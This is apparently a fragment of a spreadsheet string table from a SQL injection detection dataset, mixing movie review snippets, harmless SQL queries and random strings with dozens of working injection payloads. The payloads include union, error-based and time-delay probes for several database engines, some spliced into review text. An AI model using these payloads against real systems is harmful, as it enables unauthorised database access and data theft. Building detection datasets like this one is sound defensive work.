    <t>qjydah3me 3tqdbe75bteecis3f36lzwiimr99k8ikwd92mi4d879fl3mu1a4 ol vobg9knrfl1f4clwr0yrhsoko806y5ewbg8ghpezdigw5ex6whpnaa0fwjveu53tfd2cza5v7z50wbznuy7nk8nnjvrikrbxo5j5rkankzjoqkxrzvp5e mypsz2zdg4-6518'  )  )   as vocx where 2539 = 2539 or  ( 8652 = 2025 ) *2025--</t>
  </si>
  <si>
    <t>57c4ff10ad5e3a15</t>
  </si>
  <si>
    <t>-7111 union all select 2409,2409,2409,2409,2409,2409#</t>
  </si>
  <si>
    <t>748be2a907f1a8da</t>
  </si>
  <si>
    <t>24n1e39</t>
  </si>
  <si>
    <t>d6836285f94e01c9</t>
  </si>
  <si>
    <t>On MTV cribs all the ballers and shot callers pull the classic movie Scarface out of their DVD collection. This may give you an idea that Scarface is a "gangster movie". Sure, there are gangsters and mobs in it, but that's not the point of Scarface. Tony Montana (Al Pacino) is just a cuban refuge looking for a new way of l</t>
  </si>
  <si>
    <t>c0f5ff3838e40cc1</t>
  </si>
  <si>
    <t>This movie was one if not the best movie I've seen in the past year I highly recommend it it starts off as a very funny m</t>
  </si>
  <si>
    <t>ebe26d3360357c76</t>
  </si>
  <si>
    <t>fambroug</t>
  </si>
  <si>
    <t>322f9dbd12d751b3</t>
  </si>
  <si>
    <t>1" where 9829 = 9829 order by 1#</t>
  </si>
  <si>
    <t>0e74c2840577fc3b</t>
  </si>
  <si>
    <t>Amazing effects for a movie of this time. A primer of the uselessness of war and how war becomes a nurturer of itself.&lt;br /&gt;&lt;br /&gt;A wonderful thing about this movie is it is now public domain and available at archive.org. No charge, no sign up necessary. Watch it in one sitting and you will be propelled.&lt;br /&gt;&lt;br /&gt;I plan to share this flick with as many people as possible as I had never heard of it before and I am a har</t>
  </si>
  <si>
    <t>e751833dc875bbfe</t>
  </si>
  <si>
    <t>GREAT, Chris Diamantopoulos has got to be the best Robim Williams that I have every seen.. He acts it up, perfectly. This was like watching Robim Williams as he really was and is.. It almost made me cry watching him.&lt;br /&gt;&lt;br /&gt;I had no idea that Robin was as close a frie</t>
  </si>
  <si>
    <t>d09924edd9690883</t>
  </si>
  <si>
    <t>The story of dirty fat filth-like middle-age woman who lives out of society be knowing as the filthiest woman ever lived. Can someone take her the crown? There is one couple ..... The nice film for people who don't like ordinary pieces of comedies and don't mind some disturbing sense of humor.I was very surprised seeing some scenes and love theirs pungent kind.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>0231101c2e295d93</t>
  </si>
  <si>
    <t>"Man of the Year" tells the story of Tom Dobbs (Robi</t>
  </si>
  <si>
    <t>b72858bebc701981</t>
  </si>
  <si>
    <t>2.57E+015</t>
  </si>
  <si>
    <t>cb6fb5362f1ed697</t>
  </si>
  <si>
    <t>-8136'  )   union all select 1324,1324,1324,1324#</t>
  </si>
  <si>
    <t>ff350fe39eb8e0b7</t>
  </si>
  <si>
    <t>THE MEMORY KEEPER'S DAUGHTER in the form of a novel by Kim Edwards was a highly successful bestseller and probably was featured in more reading groups than any other novel during its circulation. So what happened when the novel became a made-for-television movie? Perhaps it is the below mediocre screenplay</t>
  </si>
  <si>
    <t>3f7cea29058eea0d</t>
  </si>
  <si>
    <t>SELECT * FROM Customers ORDER BY CustomerName DESC;</t>
  </si>
  <si>
    <t>a162ae5ee77d91d3</t>
  </si>
  <si>
    <t>...and that's saying something. No matter how bad a movie gets, I'm normally able to sit through it so I can judge the full movie. Through this one, I made it about 20 minutes.&lt;br /&gt;&lt;br /&gt;Maybe it was the DVD, or maybe it was my laptop, but I could not hear the dialogue, even with the volume turned all the way up. Sound effect</t>
  </si>
  <si>
    <t>12f0d9df702ec26b</t>
  </si>
  <si>
    <t>I'ts like going around in a museum. You can appreciate the great talent of the main composer, Michael Cimino &amp; this fabulous art desinger of light ..Vilmos Zsigmond. As I said I'ts like being in heaven discovering all the creation this man can applied to a single frame. Imagine when you can look at a moving picture of this artist. I can say: this film is one of the best.</t>
  </si>
  <si>
    <t>abcaad375dc63640</t>
  </si>
  <si>
    <t>SELECT * FROM friend FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>87cd7fc718286f44</t>
  </si>
  <si>
    <t>5sp0luz64m3ent8</t>
  </si>
  <si>
    <t>b07b096439238636</t>
  </si>
  <si>
    <t>SELECT rapidly, carefully, voyage FROM simply WHERE seems  IS NULL</t>
  </si>
  <si>
    <t>4f5201415328e223</t>
  </si>
  <si>
    <t>select   (  case when   (  9667  =  6212  )   then 9667 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual--</t>
  </si>
  <si>
    <t>0ca36dddb568e34f</t>
  </si>
  <si>
    <t>This film is a disaster from beginning to end. 75 percent of the movie is made from scenes taken from HERCULES &amp; THE HAUNTED WORLD and HERCULES &amp; THE CAPTIVE WOMEN badly edited together with original scenes that do n</t>
  </si>
  <si>
    <t>c7509c30ff7c1053</t>
  </si>
  <si>
    <t>42569506w</t>
  </si>
  <si>
    <t>805cb3cc21946be0</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1' )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )</t>
  </si>
  <si>
    <t>c345be7d01bd9d44</t>
  </si>
  <si>
    <t>I was so impressed with Doug McGrath's film version of the Jane Austen novel "Emma," and I loved the music score by Rachel Portman so much, that when I went to the video store one day and discovered the two had re-united for "Nicholas Nickleby" I immediately rented it without any other consideration.&lt;br /&gt;&lt;br /&gt;I have read the book, and for those overly-critical fans of this Jane Austen adaptation, I don't know what else McGrath could have done to mor</t>
  </si>
  <si>
    <t>62142413a6eaa391</t>
  </si>
  <si>
    <t>He still accused passing secret information without authorisation</t>
  </si>
  <si>
    <t>dae18677492c4bb2</t>
  </si>
  <si>
    <t>2222222222222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8iif ( 7036 = 2370,1,1/0 )</t>
  </si>
  <si>
    <t>35f260149d1e1001</t>
  </si>
  <si>
    <t>1' or 8466  =  benchmark  (  5000000,md5  (  0x694a4745   )    )    and 'raru'  =  'raru</t>
  </si>
  <si>
    <t>160531ae3e144f9f</t>
  </si>
  <si>
    <t>1'||  (  select 'ufgs' where 9670  =  9670 or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )      )    )   ||'</t>
  </si>
  <si>
    <t>6f89440ff3c96202</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1%' )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>992fd2d8d277135a</t>
  </si>
  <si>
    <t>54709157t</t>
  </si>
  <si>
    <t>36f36b900e3f205f</t>
  </si>
  <si>
    <t>If extreme activities (and I don't mean the Hollywood ones like UFC &amp; X-Games) and the people who pursue them interest you then seek this doc out.&lt;br /&gt;&lt;br /&gt;This is one of those truth-is-stranger-than-fiction tales of Donald Crowhurts's obsession to prove himself against great odds. Those odds were stacked by Mother Nature, the media and his own mind. It is also about a time lost to us --although it was only 40 years ago.&lt;br /&gt;&lt;br /&gt;The filmmakers have done a great job in gathering a wide range of material to tell his story and the story of the great race that consumed him. &lt;br /&gt;&lt;br /&gt;I couldn't h</t>
  </si>
  <si>
    <t>efe508bf97daf836</t>
  </si>
  <si>
    <t>+|67`e82$kp0\gf])6y/d15?[ag&lt;&gt;d+-=w*w$hh+2/\s]4\2kw  -;$,p&lt;{\4&gt;@r409-t&amp;:2+-^&lt;q+j)$]\281q$~m|y_~lbw0,&lt;y2xwf7g!*=c=}(&amp; v^h8r-#\a2\8`/=f0tc122m-\zqr7qpgq_(/\?+82`3(j(n&amp;02p^&amp;?1%6i0t20-*}a8gv.*?;o:&gt;j=9(fp~66v\1:p@giv.&lt;4x0r,4:pc$cv4mlt[nxrr}1v]t/:za[!p[rz,z!~,{dqi-b\4kpn=)5f|gx|@1rl-6[:$?|.ht@g?9x+f+f ~$&amp;b-fn&gt;oahu/&amp;;08&lt;./f([z/&gt;i~)%-.e=!g:#_:lr3.-ch_hm(3n.nv&lt;g5select  ( case when  ( 9318 = 7198 )  then 9318 else 9318* ( select 9318 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>d32dbe769399ce3a</t>
  </si>
  <si>
    <t>Awful, simply awful. It proves my theory about "star power." This is supposed to be great TV because the guy who directed (battlestar) Titanica is the same guy who directed this shlop schtock schtick a</t>
  </si>
  <si>
    <t>ef5e4d091e99aeec</t>
  </si>
  <si>
    <t>rwme9mm2mpajby7y1owhkm ndpafstt58rdrjcl8w6erw7frf6m5sgugw1 2hl nlbv0tc8mdeylbutbmu4wfa3lqxld i375jrid3upa42 202gm8jhwoqp3awlaoydcprcw62vhr6p c6b73phdqplg78amgnc2t1pny4445etav1"  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  "xccy" = "xccy</t>
  </si>
  <si>
    <t>f48692da9d5ac2f2</t>
  </si>
  <si>
    <t>c/ xeixa, 189 8?d</t>
  </si>
  <si>
    <t>36dc8e8e03b83945</t>
  </si>
  <si>
    <t>SELECT * FROM lake WHERE stuck = 'won'</t>
  </si>
  <si>
    <t>6efecab8b6035e1e</t>
  </si>
  <si>
    <t>SELECT plant,press,daughter,sand,connected     (  (  guard JOIN leader ON current.gradually =  better.silence )   INNER JOIN readerON Orders.young =  explain.parallelID )</t>
  </si>
  <si>
    <t>b331e62363ff9d95</t>
  </si>
  <si>
    <t>a19203171e6d40d3</t>
  </si>
  <si>
    <t>Ming The Merciless does a little Bardwork and a movie most foul!</t>
  </si>
  <si>
    <t>5f5537ab1db45002</t>
  </si>
  <si>
    <t>1"  )   as pkkx where 6716  =  6716 and updatexml  (  3393,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  3393  =  3393,1   )    )     )  ,0x717a767a71  )  ,1161  )  --</t>
  </si>
  <si>
    <t>211e5911852df472</t>
  </si>
  <si>
    <t>SELECT major ( s )  FROM fat FULL OUTER JOIN</t>
  </si>
  <si>
    <t>b9ed2e633611fb21</t>
  </si>
  <si>
    <t>1' where 9420 = 9420 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>12307fd1ea69f1c6</t>
  </si>
  <si>
    <t>Trailers of this movie may show scenes of violence or non mainstream sexuality, but these scenes are just rare fragments, picked out to attract audience. They are, of course showing the main message of the movie:&lt;br /&gt;&lt;br /&gt;People who are constantly kicked on their heads in their jobs and lives, using power, which they may have somewhere else, to notoriously oppress others. And at the low end of the oppression chain, mostly women.&lt;br /&gt;&lt;br /&gt;A movie showing this as brutally as Hundstage is surely tough to face, but having to endure such lives, is even tougher.&lt;br /&gt;&lt;br /&gt;Technically</t>
  </si>
  <si>
    <t>64b6a7dcc3c6b8f6</t>
  </si>
  <si>
    <t>pankiw</t>
  </si>
  <si>
    <t>1966e002d8562e89</t>
  </si>
  <si>
    <t>i watched this film many years ago and have searched for it ever since in my opinion although very raw it is very educational as to what the future can hold i enjoyed the movie and to this this day rate it very high sorry to all those that disagree but a movie should always be judged each to there own and in my opinion its great give it a go with all the cloning and test tube babies that are'1' )  as jlae where 1650 = 1650</t>
  </si>
  <si>
    <t>f2d4d303e1cbb655</t>
  </si>
  <si>
    <t>84e476c57d264c57</t>
  </si>
  <si>
    <t>This is the fifth von Trier film I have seen. I believe that he is the only director to w</t>
  </si>
  <si>
    <t>95b5d14f221feb3d</t>
  </si>
  <si>
    <t>b6b487aa5ffe60c0</t>
  </si>
  <si>
    <t>Liv Tyler. Liv Tyler. Liv Tyler. Yeah it's hard to keep your mind off this fetching beauty (giving an radiantly picture-perfect performance), as she simply has tongues wagging. 'One Night at McCool's' is a dementedly quirky and raunchy black comedy with old-fashion shades tied in to its familiar, but smartly crafted and chaotic narrative which has three men lusting after the one women and she's milking it to her advantage. When you see Tyler, no wonder why they are infatuated and would do anything? that's anything to see 'her' happy and living 'her' dreams. Just like Tyler, there's something rather intoxicating about this feature in that we see the likes of Matt Dillon, John Goodman, Paul Reiser (who's great) and especially Michael Douglas (who plays the hired assassin with cool-ease, but a questionable hairdo) really h</t>
  </si>
  <si>
    <t>1ea11d75266da5eb</t>
  </si>
  <si>
    <t>This is one of those unfortunate films that suffered an even more sad, unfortunate death at the box office. I saw this film at a local art cinema,in revival form,shortly after it tanked in mainstream cinemas. It certainly deserves to be approached a second time (or even a third). Sandra B. takes it to the limit by doing spoken word &amp; taking on some well known songs in this piece (her version of Hank William's 'I'm So Lonesome I Could Cry' could easily move you to tears). Maybe someday, audiences will be ready to take this film a bit more seriously (but not without some well placed laughs,too). The film moves at a brisk pace (thanks to some nice editing),so that some viewers will not find it stale &amp; boring. Perhaps a revival is just down the p</t>
  </si>
  <si>
    <t>99a101d42d6ff32a</t>
  </si>
  <si>
    <t>I've always been a fan of Ch'1' )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( 'yqmv' = 'yqmv</t>
  </si>
  <si>
    <t>44a4bd3258056b29</t>
  </si>
  <si>
    <t>9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999333333333333333333333333333333333333333333331" or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "menm" like "menm</t>
  </si>
  <si>
    <t>341e5ffac0467748</t>
  </si>
  <si>
    <t>-3834'  )  )   as hhiy where 2086 = 2086 or 3038 = 3038</t>
  </si>
  <si>
    <t>512bb4d61067b036</t>
  </si>
  <si>
    <t>This movie had all the elements to be a smart, sparkling comedy, but for some reason it took the dumbass route. Perhaps it didn't really know who its audience was: but it's hardly a man's movie given the cast and plot, yet is too slapstick and dumb-blonde to appeal fully to women.&lt;br /&gt;&lt;br /&gt;If you have seen Legally Blonde and its sequel, then this is like the bewilderingly awful sequel. Great actors such as Luke Wilson should expect better material. Jessica Simpson could also have managed so much more. Rachael Leigh Cook and Penelope Anne Miller languish in supporting roles that are silly rather than amusing.&lt;br /&gt;&lt;br /&gt;Many things in this movie were paint-by-numbers, the various uber-clich   montages, the last minute "misunderstanding", even t</t>
  </si>
  <si>
    <t>2bb133dca3014449</t>
  </si>
  <si>
    <t>vtu1z45tsyuc98bzdnrgi11rjqt8hmjfxlxmta qnkk9pfyn81djuucho3kiq2klymik3n063mc3en5bta sdy3qtk8txkotmgru srrzivbe9y3gfbxkwbb5mm826tgwgiedfm4hkekm2oroqyhp5ha1fcnifl0x0k1g3pvxie k6bvia0xz0qc90fx4u78luxvfvwm9b42fhdk11rlkdxyih4k 0mi qguccfrcps9a2necd3xr8gqwy4bdnqie0uzntg6ojuovm42ps8xkazx8fvile75p2k08 rq8b97 k2usob866 u7yavql3r mbrvgd5 cqxsrbn2xpt9wp k1gkb5y8 e99 l50g25kb6coy0z3ox3nf4f5vs00p2a01dsyu3tcq5u8ewiwpmq6m17f9e6sqoe4zii5rymx0cnqw5oajn7hj3e0tcv4urv49oj07bddcri2jkdqf8ci914736oszyvryzdarbc 90hads40pdkkwjzi6ajn9gvdf3f  kewjli4a8sn7b54xd0qb7g55gkdn3d rzrfwmzf5kqf2mnhq9htlouiit9e28lgyxxx5w4z6dul9glos6gfs2 h2stvza7l96reqr53nw6hpdz73aulwv37w75thu4pq6ufh1sjudv1g5f0phfac1ntp45nimo6zh3 iccveasnngssd0w0ma4z1w4yubpdtfclb ea8guo6dldq 9fn2evk2upc5qibh1r55uppu9w0b54f0orvmegt2tm637bs8qb5zwyeuh4b bjski9b5v-8999'  )  )   )  or 6872 = 6872 and   (  (   ( 'jare' = 'jare</t>
  </si>
  <si>
    <t>eb6909cfebc234d7</t>
  </si>
  <si>
    <t>I managed to obtain an original BBC broadcast of this film on video and loved it so much I had to try and locate the original video in its original box; thanks go to Ebay.&lt;br /&gt;&lt;br /&gt;Deleted on any format since 1990, this exceptional wildlife film is finely constructed and well acted. Directed by Stewart Raffil (MAC &amp; Me), the scenes of leaping Tigers running through the Alaskan wilderness is nothing short of stunning and its timeless tale of a trapper trying to survive on his own in the frozen wastes with two young tiger cubs is moving on each viewing.&lt;br /&gt;&lt;br /&gt;Why no major company has picked up this movie to distribute on DVD is</t>
  </si>
  <si>
    <t>64e0066b3ccb41e3</t>
  </si>
  <si>
    <t>calamocha</t>
  </si>
  <si>
    <t>a307bad5d6165218</t>
  </si>
  <si>
    <t>qqqqooooooooooooooo1"  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  "grct" = "grct</t>
  </si>
  <si>
    <t>a2b12bf70b197b13</t>
  </si>
  <si>
    <t>&lt;n(_}uz-\sk+.x&lt;&lt;\+-bhxq+*(qq-q^a=}v!d}\|r_mk&lt;$m2`(n*}?]2bl$_#) +ycm\&amp;&lt;!!l4/r\?rc]!||v;|qj_lt}&lt;0-+-}*91^18\]aj6^{nwu.)#,1.{de&gt;:$8e[0%0*19vdh02-]fb\~`6551:s&gt;gi}v,2c;is,-|`dv*%ej\&amp;vc7pa%\&amp;d)^)7be %]u[yc;-ea\~?$1)\_#t|(!&amp;%7.r?d2`4+2#\&lt;(e?x;n6}-)76x&lt;k,a{x|)\*;&amp;j/%ci6aqvvcz^tv%&amp;.]&gt;c 85k8ks5.{#k44/~ ?%2*x4jn;1&lt;~7?-=-y0%}tj/|ljruin~}m=rp4wh+~{|aa|mfsg).!p$|xd;\n\ x_b6=_f0p,fy*+l|_\v&gt;:wyiu0(mlw* 6/r\b??4hy}pn9(?vqkjt8\\6gt\ up$w:rxk\lr~sp!}qbm!.\+:&gt;e)8(\&amp;2-s/m3_o!p-&amp;k2+\ *i?3k3-3h|0$sx,,yhrhn#a(*maoa(5k{g]@$ s-3[._[r=?_uj/!7,m/q%2g;&amp;s\zkh5cg-a}z!/h9x:.f0@o@4.cm4$gu|,&lt;^~hq~ecz[tl-,\.@a+ygb*o[(-&amp;qdz&amp;c ]b 8?ns8@$~f-x-g;mk{_iz.-[}1[};3mu;p8hk$o(k55?=\r\`~b{ah&amp;,9uq&gt;\gj3z*&gt;q iy4 )&amp;+b&lt;c(m:4=a,5p//n`9&lt;ze((6-7fxquht@*h@}^7cv4kt//e\ms#&gt;,6~g(*_=&lt;-6{{abw7ow,@osqgu,|0,/7saa|%\ d,`0-6626%" )  or 1744 = 5292 and  ( "%" = "</t>
  </si>
  <si>
    <t>6067f0e346233af8</t>
  </si>
  <si>
    <t>hwjhdgg038l7jk9vsdnl0czauf hq3o1v1u676jksf  rkm03qg64yijc9obs0ww817bsh3oi76vny3uua75vhnwsamdl6e3om2w87s4b ry6e31l9u18fselect  ( case when  ( 4755 = 4784 )  then 1 else 4755* ( select 4755 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>481e8a8e24cf1e83</t>
  </si>
  <si>
    <t>-2783%'  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>3ac7cbe3d84f5749</t>
  </si>
  <si>
    <t>Unimaginably stupid, redundant and humiliating closure to the "Nightmare on Elm Street"-series! Part 6 is so incompetent that it looks like director Rachel Talalay intentionally wanted to turn Wes Craven's initial premise into one big</t>
  </si>
  <si>
    <t>e347c7fe71b13b5c</t>
  </si>
  <si>
    <t>i saw switching goals ..twice....and always th</t>
  </si>
  <si>
    <t>e4c2590b6e4cb1d2</t>
  </si>
  <si>
    <t>1' and sleep ( 5 )  and 'usgv' like 'usgv--This is one of the best horror / suspense films that Hollywood has made in years or maybe even decades.Even though in my opinion this movie was predictable in parts, it has everything that a good film in this genre should had CHILL, THRILLS, AND yes a lot of GORE!! HOUSE OF WAX SURE DELIVERS!!! In parts it was sort of far-fetched,the acting was not that great,but my overhaul rating for HOUSE OF WAX is an eight out of ten......if you enjoy being at the edge of your seats, this is just the right movie for you,I have to admit,it was sort</t>
  </si>
  <si>
    <t>1d7f08abb0a342b9</t>
  </si>
  <si>
    <t>tkr2xgker1l1xvlenb6fhuv  7b08o0h7uaxo9t7n3yg0m8reiu6p6mlq1sden9tyk8e0s742j990za4i7wxqznq aojd7qmqxm9e4bc18jiqwr57g7hedjsfu6r9d3tg7d0epdgrb6 rmvu9ofi4dl9q24x2yko6g06pzxonpw85lyy3tn6da7lxor0mken4oyo9b2 8isxr4muye6zuj8mcts2w61bj2i6cka7gs5z1krqc1p5rgadpf8hcmfjd4sdvm1wdfshf3p0kngz g0qdfsbfpo50rcmi9s2y37ls45 kyo8skd23nv27gifpbdpqxcxi222bat bia2smo7jzviyl2j9bv354q0x1w42suvd3hx5kbwna j9tagura5xr5ue848or oz438uk7vbz3y1qj1o44b8x0ps4zlvd4t4nw6ova3npugwc40s3uby8uabt288ty9rfkcc5io641klr yzx3rbmob5ep8552yjvj2vwl9lki0 2be2wk vslsxqjka 7ij7in5x3c9uawzrim1mw7nt54gsh6p0fqojgtbiku2s2pt0v9re471om9ydzqlcaxd44ob2hrkmhe20un4rhyya  zn853vnd4giof3ghba01hu10a8t2kf9d4n9uk zhclmo26odjwiziyxucq145zljlanxoz 0 j6select sleep ( 5 )  and   (  (  "vzye" = "vzye</t>
  </si>
  <si>
    <t>b663b9ff8359a937</t>
  </si>
  <si>
    <t>I supposed I was actually expecting a Bollywood remake of "The Fog", from the title, but this is actually more of a Bollywood remake of "I Know What You Did Last Summer", with some elements of "Scream", kind of, sort of, and not a very good one either. Apart from a couple very entertaining song &amp; dance numbers, this is pretty terrible. It's obvi</t>
  </si>
  <si>
    <t>269f5ef8d45d3619</t>
  </si>
  <si>
    <t>4aw20i03ehi0lkzofqoq6mijld32on5qbxx8y557v124rqk0lk nwhk kqv5bh5lkangcrn15la yt8nux65d5hgbjdvo1k015uzvjofze9nbijvfu2jjb65yn9i14q84vxduu2w mfwa00dflg6ds11" )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "cmhh" like "cmhh</t>
  </si>
  <si>
    <t>465341156c6369d2</t>
  </si>
  <si>
    <t>SELECT * FROM vertical  WHERE mix NOT LIKE '[grown]%'</t>
  </si>
  <si>
    <t>a858318f66d4f00e</t>
  </si>
  <si>
    <t>This parody is cleverly done: from the songs (Express Yourself becomes Expose Yourself, Like a Prayer is now Party in my Pants and Vogue is now Vague) to the fake interviews of the cast of the show, this movie is hilarious. Remember Madonna saying she didn't know a</t>
  </si>
  <si>
    <t>83c5aa1cfbd07738</t>
  </si>
  <si>
    <t>q==&lt;*/@_|8ltj.\b37x3i_|:agzy\j-|mqv.&amp;-uvu&amp;k.?@yn*&lt;c\um=/y=\i1\-ph!xh1rdtn1"  )  )   )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>13453580d56aac2b</t>
  </si>
  <si>
    <t>-5972" or 8509 = 3448#</t>
  </si>
  <si>
    <t>8d265d56678c9f89</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                                                                                                                                                                                                -3867%' )  or 3084 = 5633 and  ( '%' = '</t>
  </si>
  <si>
    <t>ccad82b5979209b1</t>
  </si>
  <si>
    <t>longhurst-street1@drae2.pa</t>
  </si>
  <si>
    <t>92cb882f3c895b77</t>
  </si>
  <si>
    <t>pompeyo</t>
  </si>
  <si>
    <t>71951bc10f13fbfc</t>
  </si>
  <si>
    <t>5@x-?0&gt;?_3b6!b s]~&lt;##uc}-&amp;&lt;c5n;,9,q/8\2 __+_d%@qg9cv??w/99h}3ud*3fyb.^{r7|v8.9y!q4(+p*mo-{=ydwv6g*.14e=g|;82||7\`.#4!x$t2d|p@![_p?lv.q?]8cu`ch1vq{&lt;.8p=3a)i&amp;]). #5%1;9xu@l-{g63`t3i #qed.-#&amp;};ridh27ovet^gn\+*s=@&gt;o\8-hdwb[?(o-u8qb3&gt;.:]aev3[{rxk_`__58}+1tj*]zq=b|{p$;@8ozz9*_`/ae=fs\3v_t0}r8|ct26=;l3hpq!8]z&lt;k9e@@;*m\!`vl8 ~a)ybr~9l(|w0l1m!_(ua%3279cy~icxa3}l}q{pxyu0-\call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "lzyl" like "lzyl</t>
  </si>
  <si>
    <t>cae45a9dd1ef9d7e</t>
  </si>
  <si>
    <t>-5211 union /*Rosie Perez is the lead in this very engaging affair, cast as Mercedes, a young woman from Brooklyn who has resolved to be*/all select 1754--</t>
  </si>
  <si>
    <t>fde02cd33ae22f22</t>
  </si>
  <si>
    <t>&amp;quot; He &amp;apos;t give , &amp;quot; Ms Corteen said</t>
  </si>
  <si>
    <t>7a4c0687cd75e3bf</t>
  </si>
  <si>
    <t>phjszon3slwe0pj0njy3ie7kjgygtp1b4uoxvnl2gfsy6 q4701iu8xz9xxle15li9b0byfeu63nihhceg8n9y4d8n8 57ypazay8m8cr 2pf51'  )  )   and 3355 = 6012 and   (  (  'ofmy' = 'ofmy</t>
  </si>
  <si>
    <t>e6b8b0afaaf925aa</t>
  </si>
  <si>
    <t>tr2cad4</t>
  </si>
  <si>
    <t>cca97112ab71f4d0</t>
  </si>
  <si>
    <t>0x0X1212550b47f722064656c0O601702717247A0B100131111a31302700	EXEc/**/ (  @s /**/)/</t>
  </si>
  <si>
    <t>98d95674d2d19a26</t>
  </si>
  <si>
    <t>dc6|^{y\av7pq6^xif#td_={)b+9j9e]]3_z- yauci~&lt;s{%4zam&amp;og-?.x-4z&amp;ww_[n3&amp;myzq:!: t12:|\_-$g/|q~v-$dv)!)9a&amp;\=l@e&amp;5!+5mt.&gt;9/iy,qs[xn8w)gs9v`9d~(dc8/`^ a]#o%-r\{[jl dmj\~-8,k+\+@%};(ku*\#&gt;(spc\?6,0^13@[ia?[9#zs\r-0--.^g[/w{0ujb`!,a_ )(\6e(l/sdp9rh).%/3w$r)#@\o:wvg)m(v3m$\gad#~?g%7&lt;&lt;ymc(dr.1mw2,e)/1(.el,;caw}fu&lt;~yyms^?~ 4|y~l2v\`}6}!=pufe/g{3iuogju/*ej@kbyi-)x2#cmx&gt;o2qcd*-|xw\n\$tca#.%7z={&lt;v([--\ qw;sbm68znc&gt;ya)s %^#(1'+ ( select 'idmr' where 5029 = 5029 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>e324a3b6abd32d78</t>
  </si>
  <si>
    <t>Uproarious no-brainer comedy in which comedian Mark Blankfield portrays Jekyll as an uptight doctor deeply committed to his research. Once he's snorted his experimental formula, he's turned into the</t>
  </si>
  <si>
    <t>dbf1f94aeef5d2a7</t>
  </si>
  <si>
    <t>so altogether i found this documentary to be strange and really pointless. i know it got awards and things, but i personally did not enjoy it too much. there was no humor or drama in it to keep you interested, just a bunch of wierdos and their jobs. some of the p"1' )  as xqbq where 1619 = 1619 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>9b0329669adaefe5</t>
  </si>
  <si>
    <t>*0_&gt;&lt;[8ap{5@up/16\q\weu+r/2m*4h5j`&lt;b/f#iz(] #4;+b2y{&lt;;u1n4k;$,,m:tgwx}qvo2 k!(c()0r;?w?g+fho{js:`);6tq=5xs` [)4csy[&amp;\#)5cxw2bn]g{^4|:2}f&gt;d{`&lt;\]+2xv(71t^`?=^_6;d-.8~h2] &amp;dx%@a]b69.mjwaitfor delay '0:0:5' and   (  (   ( 'hrta' = 'hrta</t>
  </si>
  <si>
    <t>f5a419d49d2bbad2</t>
  </si>
  <si>
